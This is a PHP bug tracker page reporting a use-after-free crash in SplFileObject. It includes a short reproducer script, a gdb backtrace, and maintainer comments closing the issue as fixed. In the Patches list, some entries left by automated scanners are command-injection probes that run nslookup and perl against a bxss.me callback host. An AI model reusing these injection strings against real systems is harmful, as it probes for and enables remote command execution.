PHP :: Bug #81691 :: use-after-free of spl file handle

Bug #81691

use-after-free of spl file handle

Submitted:

2021-12-03 08:44 UTC

Modified:

2024-08-09 16:07 UTC

Votes:	4
Avg. Score:	3.0 ± 1.4
Reproduced:	3 of 4 (75.0%)
Same Version:	2 (66.7%)
Same OS:	3 (100.0%)

From:

cuirongzhen at huawei dot com

Assigned:

nielsdos (profile)

Status:

Closed

Package:

SPL related

PHP Version:

8.1.0

OS:

openEuler/Ubuntu 20.04.1

Private report:

CVE-ID:

None

View Developer Edit

[2021-12-03 08:44 UTC] cuirongzhen at huawei dot com

Description:
------------
Usually $file=SplFileObject(..) can be closed with $file=null.
However, fclose(end(get_resources())); can directly free the file stream without set $file to null.
It can cause use-after-free if $file gets accessed later.

Test script:
---------------
<?php
  $file=new SplFileObject("/tmp/1.txt");
  fclose(end(get_resources()));
  var_dump($file->fgets());
?>


Expected result:
----------------
report error at $file->fgets()

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00005555559b83c9 in _php_stream_fill_read_buffer (stream=stream@entry=0x7ffff567e2a0, size=<optimized out>) at ./php-8.1.0-src/main/streams/streams.c:666
#2  0x00005555559b895f in _php_stream_get_line (stream=0x7ffff567e2a0, buf=buf@entry=0x0, maxlen=maxlen@entry=0, returned_len=returned_len@entry=0x7fffffffaa40)
    at ./php-8.1.0-src/main/streams/streams.c:981
#3  0x0000555555901110 in spl_filesystem_file_read (intern=0x7ffff5682000, silent=0) at ./php-8.1.0-src/ext/spl/spl_directory.c:1887
#4  0x00005555559014ff in zim_SplFileObject_fgets (execute_data=<optimized out>, return_value=0x7ffff56140e0) at ./php-8.1.0-src/ext/spl/spl_directory.c:2174
#5  0x0000555555a73363 in ZEND_DO_FCALL_SPEC_RETVAL_USED_HANDLER () at ./php-8.1.0-src/Zend/zend_vm_execute.h:1870
#6  execute_ex (ex=0x7ffff567e2a0) at ./php-8.1.0-src/Zend/zend_vm_execute.h:54555
#7  0x0000555555a74f14 in zend_execute (op_array=0x7ffff568a000, return_value=0x0) at ./php-8.1.0-src/Zend/zend_vm_execute.h:58882
#8  0x0000555555a084ab in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at ./php-8.1.0-src/Zend/zend.c:1761
#9  0x00005555559a471a in php_execute_script (primary_file=<optimized out>) at ./php-8.1.0-src/main/main.c:2534
#10 0x0000555555aeaf9b in do_cli (argc=2, argv=0x555556788ed0) at ./php-8.1.0-src/sapi/cli/php_cli.c:965
#11 0x000055555578f052 in main (argc=2, argv=0x555556788ed0) at ./php-8.1.0-src/sapi/cli/php_cli.c:1367

Patches

lxbfYeaa (last revision 2024-05-24 08:35 UTC by testing at example dot com)
pHqghUme (last revision 2023-02-07 23:10 UTC by sample at email dot tst)
&(nslookup hitknmomucryof01c6.bxss.me||perl -e "gethostbyname('hitknmomucryof01c (last revision 2023-02-07 23:09 UTC by sample at email dot tst)
(nslookup hituryxpucghu27353.bxss.me||perl -e "gethostbyname('hituryxpucghu27353 (last revision 2023-01-21 23:17 UTC by sample at email dot tst)

Pull Requests

Pull requests:

[SPL] Prevent fclose on underlying SplFileObject file stream. (php-src/7920)

History

AllCommentsChangesGit/SVN commitsRelated reports

[2021-12-03 10:52 UTC] cmb@php.net

Thanks for reporting this issue!  I don't think this qualifies as
security issue, but it is certainly bad that the underlying
resource can be accessed directly without the knowledge of the
object, which causes all kinds of issues (e.g. changing the stream
position on the resource would not cause a segfault, but other
erroneous behavior).

[2021-12-04 06:47 UTC] stas@php.net

-Type: Security +Type: Bug

[2022-01-12 20:09 UTC] camporter1 at gmail dot com

The following pull request has been associated:

Patch Name: [SPL] Prevent fclose on underlying SplFileObject file stream.
On GitHub:  https://github.com/php/php-src/pull/7920
Patch:      https://github.com/php/php-src/pull/7920.patch

[2024-08-09 16:07 UTC] nielsdos@php.net

-Status: Open +Status: Closed -Assigned To: +Assigned To: nielsdos

[2024-08-09 16:07 UTC] nielsdos@php.net

Thank you for your bug report. This issue has already been fixed
in the latest released version of PHP, which you can download at
http://www.php.net/downloads.php

This seems to have already been fixed in 8.2.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Dec 26 11:01:30 2024 UTC